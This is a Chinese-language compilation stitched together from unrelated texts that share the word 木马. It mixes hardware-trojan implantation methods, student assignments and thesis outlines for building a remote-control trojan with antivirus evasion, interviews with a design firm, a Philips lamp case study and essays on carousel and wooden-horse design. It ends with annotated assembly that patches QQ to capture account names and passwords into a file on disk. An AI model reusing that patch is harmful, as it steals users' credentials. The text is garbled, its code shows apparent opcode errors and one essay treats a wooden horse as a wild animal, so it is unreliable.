木马设计公司设计与方法总结

八种硬件木马设计和实现硬件木马是指通过在计算机硬件上植入恶意代码，实现对目标计算机的操控和攻击的一种恶意软件。

与软件木马相比，硬件木马更加隐蔽，很难被检测和清除。

下面将介绍八种常见的硬件木马设计和实现方法。

1.主板固件植入：通过对计算机主板固件进行修改，将恶意代码写入主板的固件中。

这样在计算机启动时，恶意代码会自动加载并运行，从而实现对目标计算机的控制。

2.硬盘固件植入：恶意代码可以被植入到硬盘的固件中，当计算机启动时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以读取硬盘上的数据，或者在计算机运行中篡改数据。

3.网卡固件植入：恶意代码可以被植入到网卡的固件中，当计算机连接到网络时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以监听和窃取网络通信数据，或者篡改传输数据。

4.显示器固件植入：恶意代码可以被植入到显示器的固件中，当计算机连接到显示器时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以监控和截获显示器的显示内容，包括屏幕上的敏感信息。

5.键盘固件植入：恶意代码可以被植入到键盘的固件中，当用户使用键盘输入时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以记录用户的敏感输入信息，如密码、信用卡号等。

6.鼠标固件植入：恶意代码可以被植入到鼠标的固件中，当用户使用鼠标时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以控制鼠标的移动和点击，实现对目标计算机的操控。

B设备植入：恶意代码可以被植入到USB设备的固件中，当用户将USB设备连接到计算机时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以利用USB设备传输恶意代码，实现对目标计算机的攻击。

8.CPU植入：恶意代码可以被植入到CPU中的控制电路中，当计算机启动时，恶意代码会自动加载并运行。

通过这种方式，攻击者可以直接控制和操控CPU的功能，实现对目标计算机的远程控制。

以上是八种常见的硬件木马设计和实现方法。

由于硬件木马具有隐蔽性高、难以被检测和清除等特点，对于用户来说，保持计算机硬件的安全是至关重要的。

网络安全课设组成员：崔帅200800824114甘春泉200800824126课程设计组员分工如下：崔帅：木马主体程序甘春泉：木马测试、不兼容模块的修改、课程设计报告题目：木马（远程控制）系统的设计与实现1）任务参考同学们在课堂上的讨论，在Windows平台上设计并实现一个木马（远程控制）系统。

2）要求⏹实现木马的基本功能：自动安装、安装后文件删除、进程隐蔽、自动启动、远程控制等；⏹实现杀毒软件等安全防护软件的免杀。

一、木马的定义木马本质上是一种经过伪装的欺骗性程序, 它通过将自身伪装吸引用户下载执行, 从而破坏或窃取使用者的重要文件和资料。

木马程序与一般的病毒不同，它不会自我繁殖，也并不刻意!地去感染其他文件, 它是一种后台控制程序。

它的主要作用是向施种木马者打开被种者电脑的门户，使其可以任意毁坏、窃取被种者的文件，甚至远程操控其电脑。

二、木马的组成一般来说，完整的木马由两部分组成，即服务端Server 和客户端Client，也就是采用所谓的C/S 模式。

如下图2-1所示：图2-1木马的服务端和客户端一个完整的木马系统以下几部分组成:1、硬件部分建立木马连接所必须的硬件实体。

控制端：对服务端进行远程控制的一方。

服务端：被控制端远程控制的一方。

INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

2、软件部分实现远程控制所必须的软件程序。

控制端程序：控制端用以远程控制服务端的程序。

木马程序：潜入服务端内部，获取其操作权限的程序。

木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

3、建立连接的必要元素通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。

控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。

控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。

设计访谈案例一：人物：丁伟职务：木马工业设计有限公司设计总监1.请简单概括木马的特点或着竞争优势？丁伟：从设计服务的角度看“MOMA工业设计”的特点是：能够提供全方位系统性设计服务的专业机构。

如果包含自主品牌“漫生活”和“多少”在内，我们的特点是以工业设计为核心竞争力来整合制造与销售的商业模式实践者。

2.你怎么样管理一个设计团队？丁伟：管理上我主要是抓重点，一个是抓每个团队的领导，一是抓重点的项目。

比如我现在最关心的是创意产品和设计前期部分，我就会在这个阶段重点推动这个部分。

3.你将会关注那些与设计有关的领域？丁伟：这也是一个自然选择，近期来说还会关注生活用品和时尚家具类；如果远期来说我还是有一些艺术倾向，希望做一些有反思意味的作品。

4.当前中国设计的最大问题是什么？丁伟：我认为要建立一个大的格局，设计公司与企业优势互补，打破设计公司无法实现产品和企业无法提升附加价值的被动格局。

还有就是“创意高速公路”，我希望设计师不再在产品实现方式的路上跋涉，而是建立一个这种产品实现方式的告诉公路，有了这个大的格局才能真正实现创意产业的价值。

对于这个大格局的架构也是我在一直思考的。

5.你怎么看中国设计行业和以后的发展？丁伟：中国的设计界发展是不平衡的也各有特点，比如北京更学术而上海更商业。

对于行业的发展方向在我看来是这样的，在未来的十年将会产生分化，一是整合的大型的设计集团将出现；二是具有商业价值的明星将出现；三是比较低端的、大量的设计公司依旧会存在;第四就是独立设计师品牌的成熟与发展。

案例二：人物：娄永琪职务：上海筑道城市设计咨询有限公司创意总监1.你认为怎样才可以设计出来好的产品来？娄永琪：越来越多的人认识到，设计如果仅停留在“物”这个层面上是不够的。

比如说一个茶杯，他可以很美好，也可能无关紧要。

但设计可以影响到一个社会的“生活方式”，那情况就不一。

这样就要求设计师对生活更深的理解。

比如我的一个茶杯，是武夷山一个茶人设计的。

木马设计01. 飞利浦阅读灯 - “精于心，简于形”客户名称: 飞利浦项目内容: 市场调研、工业设计、结构设计项目时间: 2008项目背景：众所周知，飞利浦是全球著名的多元化企业，在照明、医疗、家电等领域处于领导地位。

同时也是最重视工业设计的跨国企业之一，以拥有优秀的设计师为荣，在荷兰总部、香港、新加坡等地拥有自己的设计机构。

木马非常荣幸的有机会与飞利浦研究院在照明、医疗等领域展开一系列合作，打造创新的满足用户需要的产品。

My Reading Light是飞利浦研究院研发的一款创新产品，为学生、商务人士、读书爱好者等用户看书时使用。

设计的目标是打造属于飞利浦的，“精于心，简于形”的产品。

站。

Q群讨论中29395151飞利浦研究院负责产品整体规划和技术研发，木马负责工业设计、结构设计和量产支持，飞利浦香港设计中心负责设计咨询和包装设计。

第一个阶段是设计研究，包括自身分析、竞争分析、潮流趋势分析、用户研究等部分，理解飞利浦的品牌诉求和价值主张是这个阶段的重点，飞利浦香港设计中心的设计师给予了很好的指导意见，让设计师深入理解“精于心，简于形”的核心内涵。

概念设计阶段,设计师根据设计研究提出设计方向,有的概念强调遵循飞利浦的设计语言,有的强调复古风,有的更加关注用户的使用方式,在不同的思路引导下提出大量的设计草案.选定的是所有概念中最简约的方案,仅保留了最原始的功能和最必要的附加功能,设计语言强化飞利浦的设计符号特征.设计关注每一个细节,包括按键的选择,是用按的方式还是用推的方式？档位是需要清晰一点还是柔和一点？它需要放置在正面、顶面还是侧面,哪种方式有更好的用户体验？项目作为飞利浦研究实验室的标志性项目在创新大会上展出，获得包括飞利浦CEO柯慈雷先生在内的管理委员会的一致好评．这次合作也让木马收获很多，在设计流程、设计观念、分析方法上进一步完善，木马设计的思维方法，对于设计的深刻理解也给飞利浦相关人员留下很深的印象，是本土设计公司与跨国企业的一次高效的合作。

长沙理工大学《计算机网络技术》课程设计报告学 院专 业 班 级 学 号 学生姓名 指导教师 课程成绩 完成日期课程设计成绩评定学院专业班级学号学生姓名指导教师完成日期指导教师对学生在课程设计中的评价指导教师对课程设计的评定意见课程设计任务书城南学院通信工程专业木马程序的设计与实现学生姓名：指导老师：摘要本文在研究著名木马BO2K技术的基础上设计了一款远程控制木马。

该木马程序能够通过客户端对远程主机进行控制和监视，服务端可以自动连接客户端.另外该木马程序还包括远程文件操作（文件复制、拷贝、删除、下载、上传等）,远程系统控制(重启、屏幕锁定、启动项管理）,网络连接控制，远程进程管理和键盘监控等功能。

最后本文实现了这一款木马程序，并对其进行了测试.测试结果显示该木马程序实现了所有的功能，能够对远程主机进行控制.关键字客户端/服务端；BO2K；远程控制1 引言随着互联网技术的迅猛发展，网络给人们带来了很多便利，日益发达的网络产品越来越多。

伴随这样的发展,随之而来的是越来越多的帐号与密码，而这些帐号与密码背后伴随的是很多的经济价值.在这种状况下，很多人想尽一切办法的去找取配套的密码与帐号,所以为了使帐号与密码更加安全,有必要去研究木马的工作原理.1.1 课程设计目的（1）掌握木马编程的相关理论，理解木马工作的基本原理，学会运用C++进行编程实现.（2）加深对课本知识的理解，并运用所学理论和方法进行一次综合性的设计训练，同时掌握工程设计的具体步骤和方法,从而培养独立分析问题和解决问题的能力，提高实际应用水平。

（3)以所学知识为基础，针对具体设计问题，充分发挥自己的主观能动性，独立地完成课程设计分配的各项任务，并通过课程设计培养严谨的科学态度和认真的工作作风.1.2 课程设计内容（1)查找木马程序主要技术及相应软件;（2）比较他们的技术及优缺点；（3）实现一个简单的木马程序；(4）提交文档;1.3 课程设计要求（1）按要求编写课程设计报告书，能正确阐述设计结果。

空中旋转木马设计一个能够在空中旋转的小木马空中旋转木马设计方案：空中旋转木马作为儿童游乐园中备受欢迎的项目，其设计至关重要。

本文将分享一个能够在空中旋转的小木马设计方案，以求给孩子们带来更加刺激和愉快的游乐体验。

1. 结构设计空中旋转木马的结构设计是关键，需要考虑到稳固性和安全性。

首先，木马的主体采用坚固耐用的钢架，保证整体的稳定性。

同时，木马座椅以碳纤维材质制成，轻便且具有一定的弹性，能够减少孩子们乘坐时的颠簸感，增加舒适度。

2. 外观设计木马外观设计应该色彩鲜艳、形状可爱，吸引孩子们的目光。

可以在木马的表面增加精美的图案和卡通形象，让孩子们在玩耍的同时感受到快乐和童趣。

此外，为了增加趣味性，可以在木马周围安装LED灯光，使木马在夜晚也能够散发出迷人的光芒。

3. 旋转机制空中旋转木马的旋转机制至关重要，它影响着木马的稳定性和旋转效果。

设计时可以考虑采用电动旋转系统，通过控制电机的转速和方向，实现木马在空中的旋转。

在旋转过程中，可以搭配合适的音乐，为孩子们营造出欢快的氛围。

4. 安全保障在设计空中旋转木马时，必须要考虑到安全问题。

首先，木马的整体结构必须符合安全标准，避免出现倾斜或者折断的情况。

其次，座椅和扶手的设计也需要考虑到孩子们的安全性，确保他们在乘坐时不会发生意外。

综上所述，空中旋转木马的设计需要综合考虑结构、外观、旋转机制和安全保障等因素。

通过精心设计，可以打造出一个既安全又有趣的空中旋转木马，为孩子们带来愉快的游乐体验。

愿孩子们在这个设计的木马上度过一段快乐的时光！。

木马造型设计理念木马，作为一种具有强烈童趣和寓意的形象，一直以来都是受到人们喜爱的主题之一。

在木马造型设计中，设计师可以发挥无限的想象力，创造出独特的艺术品。

我认为木马造型设计的理念应该注重以下几个方面。

首先，木马造型设计应该注重形象的可爱和生动。

木马具有天真活泼的形象，在设计中可以通过明亮的色彩、柔和的线条和卡通般的表情来展现出来。

例如，可以选择鲜艳的红色作为主色调，用大眼睛和笑脸设计来增添可爱的感觉。

同时，在造型设计中，可以选择丰富多样的动作和表情来让木马更富有生命力，让人一看就能感受到温暖和渴望。

其次，木马造型设计还应该注重文化元素的融入。

木马作为中国民间传统艺术的一部分，具有浓厚的文化底蕴。

设计师可以在造型设计中融入中国传统的图案和符号，例如用中国式的龙纹或蝴蝶结来装饰木马的外观，以突出木马的中国传统特色。

此外，还可以考虑将木马造型与其他传统文化元素相融合，例如风筝、红绳等，加深木马形象与中国文化的关联。

同时，木马造型设计还应该关注功能性和实用性。

木马不仅仅是一种艺术品或装饰品，它也可以成为实际的家具或玩具。

因此，在设计中要考虑木马的稳定性和耐用性，以确保它可以实际使用。

设计师可以采用优质的材料，结构合理的设计，以增强木马的稳定性和耐用性。

此外，设计师还可以考虑在木马上增加一些实用功能，例如保护儿童安全的座椅设计、储物功能等，提高木马的实用性。

最后，木马造型设计还应该注重环保和可持续发展。

在选择材料和生产过程中，设计师应该选择环保和可持续发展的方式。

例如，选择使用可再生材料如木头或竹子，减少对环境的影响。

同时，设计师还可以采用模块化的设计思路，以便于零件的更换和修复，延长木马的使用寿命。

此外，设计师还可以鼓励用户参与到设计中，例如提供组装木马的方式，增强用户的参与感和对环保的意识。

总之，木马造型设计的理念应该注重形象的可爱和生动，融入文化元素，关注功能性和实用性，同时注重环保和可持续发展。

本科生毕业论文（设计）题目特洛伊木马程序的设计与实现学生姓名指导教师学院专业班级完成时间2010年5月28日摘要随着计算机网络技术的飞速发展，黑客技术也不断更新，它对网络安全构成了极大的威胁。

特洛伊木马作为黑客工具中重要的一员，其技术日新月异，破坏力之大是绝不容忽视的。

因此，对木马技术的研究刻不容缓。

本文首先介绍了木马的基本概念，包括木马的结构、行为特征、功能、分类以及木马的发展现状和发展趋势。

然后详细介绍了木马的工作原理和木马系统的关键技术。

木马的关键技术包括木马的伪装方式、木马程序的隐藏技术、木马的自启动以及木马的通信技术等。

另外，本文研究了远程控制技术，包括TCP/IP协议的介绍、Socket通信技术和客户端/服务器模型（C/S）。

本文在研究木马技术的基础上设计了一款远程控制木马。

该木马程序能够通过客户端对远程主机进行控制和监视，服务端可以自动连接客户端。

另外该木马程序还包括远程文件操作（文件复制、拷贝、删除、下载、上传等），远程系统控制（关机、重启，鼠标、屏幕锁定，启动项管理），网络连接控制，远程进程管理和文件传输等功能。

最后本文实现了这一款木马程序，并对其进行了测试。

测试结果显示该木马程序实现了所有的功能，能够对远程主机进行控制。

关键词木马，Socket，远程控制ABSTRACTWith the rapid development of network, the dependence between our society, computer system and information network becomes bigger and bigger. The safety of the internet is especially important. The hackers create a great network security threats, and the currently most available mean of invasion are the Trojan technology. Therefore, this technique has been studied for the Trojan technology.This paper introduces the basic concepts of Trojans, including structure, behavior characteristics, function, classification and Trojans situation and development trend. Then, it also introduces the details of the Trojan works and Trojan key technology. Key technologies include Tr ojan disguised way, stealth technology of Trojans, Trojans’ self-running and communication technology. In addition, this paper also studies about the remote control technology, including TCP/IP protocol description, Socket communication technology and client / server model (C / S).There is a remote control Trojan based on this paper which is studying the Trojan technology. This Trojan horse can control and watch the distance host through the client, and the server can connect with the client automatically. In addition, the Trojan program also includes a remote file operations (file copy, copy, delete, download, upload, etc.), remote system control (shutdown, restart, mouse, screen lock, startup item management), network connection control, remote process management, file transfer and other functions. Finally, this paper realizes this Trojan horse program, and tests it. Test results show that the Trojan horse program achieves all the functions and it can control the remote host.KEY WORDS Trojan, Socket, Remote control目录摘要IABSTRACT (II)第一章绪论 (1)1.1木马的研究背景 (1)1.2木马发展的现状 (1)1.3论文研究的意义和目的 (2)1.4论文的研究内容 (3)1.5论文章节安排 (3)第二章木马技术基础 (4)2.1木马系统结构 (4)2.2木马的基本特征 (5)2.3木马的功能 (6)2.4木马的分类 (6)2.5木马的发展趋势 (7)第三章木马工作原理及关键技术 (9)3.1 木马的伪装 (9)3.2木马的隐藏 (10)3.3木马常见的启动方式 (12)3.4远程控制技术 (14)3.4.1IP协议 (14)3.4.2 TCP协议 (15)3.4.3套接字(Sockets)技术 (16)3.5木马的通信 (16)3.5.1端口复用技术 (17)3.5.2反弹端口 (17)3.5.3潜伏技术 (18)3.6客户机/服务器模型 (18)第四章远程控制木马的设计 (20)4.1功能分析 (20)4.2系统总体设计 (21)4.2.1使用环境和拓扑结构 (21)4.2.2系统的逻辑模型 (22)4.2.3设计思路 (23)4.3系统实现的关键技术 (24)4.3.1DLL模块化技术 (24)4.3.2 钩子技术 (26)4.3.3远程线程插入技术 (27)4.3.4隐蔽通信技术 (29)4.4系统的开发工具 (30)第五章远程控制木马的实现 (32)5.1服务端程序的实现 (32)5.1.1服务端的自启动 (32)5.1.2 通信模块的实现 (34)5.1.3服务端管理模块 (38)5.2客户端的实现 (39)5.2.1远程文件控制 (39)5.2.2系统控制 (40)5.2.3文件传输 (42)第六章结束语 (43)参考文献 (44)致谢 .................................................................................. 错误！未定义书签。

木马造型设计理念
木马是一种原始而神秘的生物，在古代文化中被广泛描绘成一种象征力量、勇气和自由的形象。

因此，木马的造型设计理念不仅仅是追求美感，更是要表达这些深层意义。

首先，木马的造型设计应体现力量和稳固性。

木马是一种庞大而强壮的动物，因此造型设计上，要注重突出其肌肉质感和雄壮的外貌。

可以通过各种细节的处理来呈现出木马的力量感，如强健的四肢、粗壮的躯干和有力的肌肉线条。

其次，木马的造型设计应体现勇气和英勇。

木马一直被视为一种勇敢的生物，因为它们经常在野外与其他动物进行搏斗，保卫自己和群体的领地。

在木马的造型设计中，可以通过姿态、表情等各种细节来传达英勇的意味。

例如，木马可以被设计成抬头挺胸，昂首挺背的姿态，眼神坚定，准备迎接任何挑战。

此外，木马的造型设计还应体现自由和奔放的精神。

木马是一种生活在野外的动物，它们可以驰骋在大地上，无拘无束地奔跑。

因此，在木马的造型设计中，可以选择飞腾的姿态，或者是展示奔跑的动感。

还可以通过留下空隙或开放的形式，来呈现木马的自由和无拘无束的精神。

最后，木马的造型设计还应该注重细节和纹理处理。

细节和纹理可以为木马的造型增添丰富的层次和质感，使其更加生动和具有立体感。

例如，可以在木马的体表绘制出细致的纹路和纹饰，或者使用真实的木材来制作，以增强真实感和触感。

总之，木马的造型设计理念不仅仅是追求美感，更要表达力量、勇气和自由。

通过突出木马的力量感、勇敢精神、奔放自由以及细节纹理的处理，可以让木马的造型设计更加生动、富有艺术感，并能够传递出深层的文化内涵。

计算机病毒与防治课程设计题目：木马制作原理分析姓名：孙明杨学号：201230210223班级：1232102专业：信息工程（安全方向）指导老师：韩梅2014年10月目录第一章引言 (3)1.1研究背景 (3)1.2发展的现状 (3)第二章木马技术基础 (4)2.1系统结构 (4)2.2基本特征 (5)2.3功能 (5)2.4分类 (6)第三章远程控制木马的设计 (8)3.1功能分析 (8)3.2系统总体设计 (8)3.3系统实现的关键技术 (9)3.4 系统的开发工具 (9)3.5 代码实现 (10)第四章远程控制木马的实现 (12)4.1服务端程序的实现 (12)4.1.1服务端的自启动 (12)4.1.2 通信模块的实现 (13)4.1.3服务端管理模块 (11)4.2客户端的实现 (12)4.2.1远程文件控制 (13)4.2.2系统控制 (14)4.2.3冰河信使 (17)第五章结束语 (18)参考文献 (18)第一章引言1.1研究背景木马的全称是“特洛伊木马”（Trojan horse），来源于希腊神话。

古希腊围攻特洛伊城多年无法攻下，于是有人献出木马计策，让士兵藏匿于巨大的木马中，然后佯作退兵，城中得知解围的消息后，将“木马”作为战利品拖入城内，匿于木马中的将士出来开启城门，与城外部队里应外合攻下特洛伊城，后世称这只大木马为“特洛伊木马”。

随着网络的快速发展，Internet深入到社会的每个角落，人们充分享受到了其给工作和生活带来的巨大便利，人类社会对计算机系统和信息网络的依赖性也越来越大。

工业和信息化部统计数据显示，2009年中国网民规模已达3.84亿；预计2010中国网民规模突破4亿[1]。

由于计算机系统和信息网络系统本身固有的脆弱性，网络入侵工具(如蠕虫、木马等)不断涌现，社会、企业和个人也因此蒙受了越来越大的损失。

木马由于它的隐蔽性、远程可植入性和可控制性等技术特点，已成为黑客攻击或不法分子入侵网络的重要工具，目前，不断发生的互联网安全事故中，大部分都有木马的身影。

代码实现在4002D0处写入字符串：C:\MSDOS.DB在4002E0处写入0DH,0AH在4002F0处写入字符串：C:\FLAGE.DB在400300处写入代码：400300：50 PUSH EAX；保存EAX的值到堆栈中400301：58 POP EAX；退栈，但堆栈中已经保存了EAX的值400302：83C408 ADD ESP，8；退栈（２个双字），原堆栈的值暂时不会被改写400305：A1FCF7A100 MOV EAX，[A1F7FC]；将A1F7FC单元保存的数值存放到EAX寄存器中40030A：36870424 XCHG EAX，SS：[ESP]；交换堆栈顶与EAX的值40030E：36874424FC XCHG EAX，SS：[ESP-4]；交换堆栈顶与堆栈顶-4处的值400313：36874424F8 XCHG EAX，SS：[ESP-8]；交换堆栈顶-4与堆栈顶-8处的值400318：83EC0C SUB E SP，C；堆栈顶向下移动３个双字40031B：36870424 XCHG EAX，SS：[ESP]；交换堆栈顶-8与现在堆栈顶即原堆栈底-C的值，这样做的好处是将[A1F7FC]的值存放到原堆栈顶+8处，同时，原堆栈顶+8处的值后移一个双字，在将堆栈顶-4，即进栈一个双字40031F：FF1528D66100 CALL GETWINDOWTEXTA；获得窗口的标题文字400325：36870424 XCHG EAX，SS：[ESP]；保存EAX即函数返回值到堆栈顶，同时得到DS：[A1F7FC]处的值400329：9C PUSHFD；保存标志寄存器的值40032A：3D00D98E01 CMP EAX，18ED900；比较EAX的值是否大于18ED900大于表示将在读密码或账号需要记录，小于表示没有读取密码或账号无需记录40032F：0F8652000000 JNA 400387；无需记录则跳转400335：60 PUSHAD；保存16个通用寄存器的值400336：6800000000 PUSH 040033B：6802000000 PUSH 2400340：6801000000 PUSH 1400345：6800000000 PUSH 040034A：6800000000 PUSH 040034F：68000000C0 PUSH C0000000400354：68F0024000 PUSH 4002F0400359：FF15D0D26100 CALL CREATEFILEA；调用创建文件函数，如文件存在则失败40035F：83F8FF CMP EAX，-1；EAX保存有函数返回值，为-1表示不成功，其他表示成功（返回值为文件句柄）400362：0F841E000000 JZ 400386；不成功则跳转400368：50 PUSH EAX；保存文件句柄到堆栈400369：FF1538D36100 CALL CLOSEHANDLE；调用关闭文件函数40036F：6884034000 PUSH 400384；保存程序返回地址400374：FF35FCF7A100 PUSH [A1F7FC]；保存密码存放地址40037A：FF3500F8A100 PUSH [A1F800]；保存账号存放地址400380：6800044000 PUSH 400400；保存程序跳转地址（即调用保存用户名及密码函数）400385：C3 RET；程序转向400386：61 POPAD；还原16个通用寄存器400387：9D POPFD；还原标志寄存器400388：58 POP EAX；还原EAX的值400389：6800064000 PUSH 400600；保存程序跳转地址40038E：C3 RET；程序转向在400400处写入子功能代码（此功能代码的作用是将用户名及密码写入C：\MSDOS.DB 文件末尾，要求参数为密码、用户名存放地址，同时要求必须先将密码压入堆栈）400400：6800000000 PUSH 0400405：6802000000 PUSH 240040A：6804000000 PUSH 440040F：6800000000 PUSH 0400414：6800000000 PUSH 0400419：68000000C0 PUSH C000000040041E：68D0024000 PUSH 4002D0400423：FF15D0D26100 CALL CREATEFILEA；创建文件，如文件存在则打开文件，EAX返回文件句柄，如为-1则失败400429：83F8FF CMP EAX,-140042C：0F8477000000 JZ 4004A9；失败则跳转400432：50 PUSH EAX；保存文件句柄400433：6802000000 PUSH 2400438：6800000000 PUSH 040043D：6800000000 PUSH 0400442：50 PUSH EAX400443：FF1584D36100 CALL SETFILEPOINTER；设置文件指针到文件末尾400449：58 POP EAX；还原文件句柄40044A：59 POP ECX；得到用户名存放地址40044B：51 PUSH ECX；保存用户名存放地址40044C：8BD8 MOV EBX，EAX；保存句柄到EBX寄存器40044E：51 PUSH ECX；保存用户名存放地址40044F：FF151CD36100 CALL LSTRLENA；调用得到字符串长度函数，由EAX 返回字符串长度400455：40 INC EAX；字符串长度加1，使程序多填入一个16进制的0（相当于空格字符），方便将用户名与密码分开400456：59 POP ECX；得到用户名存放地址400457：6800000000 PUSH 040045C：681CF8A100 PUSH A1F81C400461：50 PUSH EAX400462：51 PUSH ECX；保存用户名存放地址400463：53 PUSH EBX400464：FF157CD36100 CALL WRITEFILE；将用户名写入创建的文件40046A：59 POP ECX；得到密码存放地址40046B：51 PUSH ECX；保存密码存放地址40046C：51 PUSH ECX40046D：FF151CD36100 CALL LSTRLENA；得到密码的长度400473：59 POP ECX；得到密码存放地址400474：6800000000 PUSH 0400479：681CF8A100 PUSH A1F81C40047E：50 PUSH EAX40047F：51 PUSH ECX400480 ：53 PUSH EBX400481：FF157CD36100 CALL WRITEFILE；将密码写入文件400487：6800000000 PUSH 040048C：681CF8A100 PUSH A1F81C400491：6802000000 PUSH 2400496：68E0024000 PUSH 4002E040049B：53 PUSH EBX4004AC：FF1538D36100 CALL WRITEFILE；将回车、换行符写入文件4004A2：53 PUSH EBX；保存文件句柄4004A3：FF1538D36100 CALL CLOSEHANDLE；关闭文件4004A9：C3 RET；返回调用程序在400500处写入代码：400500：60 PUSHAD400501：68F0024000 PUSH 4002F0400506：FF1520D36100 CALL DELETEFILEA；删除标志文件40050C：61 POPAD40050D：68538F5800 PUSH 588F53；保存原QQ程序被中断点地址400512：64A100000000 MOV EAX，FS：[0]；原QQ程序中被替换的代码，依据环境工程学的观点应该保持程序运行环境不变，因此必须还原其寄存器、堆栈、指令，此处就是还原其被替换的指令400518：C3 RET；返回原QQ程序被中断点在400600处写入代码：400600：60 PUSHAD400601：6800000000 PUSH 0400606：6802000000 PUSH 240060B：6801000000 PUSH 1400610：6800000000 PUSH 0400615：6800000000 PUSH 040061A：68000000C0 PUSH C000000040061F：68F024000 PUSH 4002F0400624：FF15D0D26100 CALL CREATEFILEA；创建文件，当文件存在时则打开文件40062A：83F8FF CMP EAX，-140062D：0F84FB000000 JZ 40072E；出错则跳转400633：50 PUSH EAX；保存文件句柄400634：8BD8 MOV EBX，EAX；保存文件句柄到EBX寄存器400636：6800000000 PUSH 040063B：681CF8A100 PUSH A1F81C400640：6808000000 PUSH 8400645：FF7510 PUSH [ESP+10]400648：58 POP EAX400649：83E804 SUB E AX，4；得到要写入数据的地址40064C：59 PUSH EAX；将其压入堆栈40064D：90 NOP40064E：90 NOP40064F：90 NOP400650：53 PUSH EBX400651：FF157CD36100 CALL WRITEFILE；将数据写入文件，此处只能使用WINDOWS系统调用，WINDOWS系统调用将运行于特权级，只有它才能访问任何内存（包括读、写、执行）而不引发非法操作，否则会引发内存越权访问错误，从而引发非法操作400657：6800000000 PUSH 040065C：6800000000 PUSH 0400661：6800000000 PUSH 0400666：53 PUSH EBX400667：FF1584D36100 CALL SETFILEPOINTER；设置文件指针到文件的开始处40066D：58 POP EAX；得到文件句柄40066E：50 PUSH EAX；保存文件句柄40066F：50 PUSH EAX400670：50 PUSH EAX；这两个EAX的存储位置实际被用于存储从文件中读取的数据，因此不用EAX寄存器用别的寄存器也行，因为我们没有写别的内存的权力，因此只有利用堆栈，任何应用程序都有修改堆栈的权利，因此，只有堆栈才能被用于暂时存放数据，而不会引发由于越权访问引发的非法操作400671：6800000000 PUSH 0400676：681CF8A100 PUSH A1F81C40067B：6808000000 PUSH 8400680：54 PUSH ESP400681：368B0424 MOV EAX，[SS：ESP]400685：38C010 ADD EAX，10；修改数据写入地址400688：36890424 MOV [SS：ESP] ，EAX40068C：53 PUSH EBX40068D：FF15D8D26100 CALL READFILE；将数据读取到堆栈中400693：90 NOP；空操作，此处是由于我修改代码造成代码不连续，从而填充空操作，是代码连续400694：90 NOP400695：90 NOP400696：90 NOP………………4006B5：90 NOP4006B6：FF1538D36100 CALL CLOSEHANDLE；关闭标志文件4006BC：68F0024000 PUSH 4002F04006C1：FF1520D36100 CALL DELETEFILEA；删除标志文件4006C7：58 POP EAX；得到密码存放地址4006C8：5B POP EBX；得到用户名存放地址4006C9：50 PUSH EAX；保存密码存放地址4006CA：53 PUSH EBX；保存用户名存放地址4006CB：53 PUSH EBX；保存用户名存放地址4006CC：50 PUSH EAX；保存密码存放地址4006CD：FF151CD36100 CALL LSTRLENA；得到密码的长度4006D3：83F800 CMP EAX，0；比较密码的长度是否为04006D6：740D JZ 4006E5是则跳转4006D8：FF151CD36100 CALL LSTRLENA；得到用户名长度4006DE：83F800 CMP EAX，0；比较用户名长度是否为04006E1：7507 JNZ 4006EA；不为0则，跳转到保存用户名及密码的代码段4006E3：7401 JZ 4006E6；为0则，跳转到程序结束4006E5：5B POP EBX；因堆栈被占用3个双字，因此需要3次退栈操作4006E6：58 POP EAX4006E7：58 POP EAX4006E8：EB44 JMP 40072E；跳转到程序结束4006EA：58 POP EAX；得到用户名存放地址4006EB：5B POP EBX；得到密码存放地址4006EC：68F9064000 PUSH 4006F9；保存程序返回地址4006F1：53 PUSH EBX；保存密码存放地址4006F2：50 PUSH EAX；保存用户名存放地址4006F3：6800044000 PUSH 400400；保存程序转移地址（即调用保存用户名及密码函数）4006F8：C3 RET；程序转向4006F9：6800000000 PUSH 04006FE：6802000000 PUSH 2400703：6801000000 PUSH 1400708：6800000000 PUSH 040070D：6800000000 PUSH 0400712：68000000C0 PUSH C0000000400717：68F0024000 PUSH 4002F040071C：FF15D0D26100 CALL CREATEFILEA；创建标志文件400722：83F8FF CMP EAX,-1400725：7407 JZ 40072E400727：50 PUSH EAX400728：FF1538D36100 CALL CLOSEHANDLE；关闭标志文件40072E：61 POPAD；还原16个通用寄存器的值40072F：68E2B15C00 PUSH 5CB1E2；保存原QQ程序被中断点地址400734：C3 RET；返回原QQ程序被中断点地址在5CB1DC处写入代码：5CB1DC：6800034000 PUSH 4003005CB1E1：C3 RET其原代码为FF1528D66100即CALL GETWINDOWTEXTA在588F4D处写入代码：588F4D：6800054000 PUSH 400500588F52：C3 RET其原代码为64A100000000即MOV EAX，FS：[0]。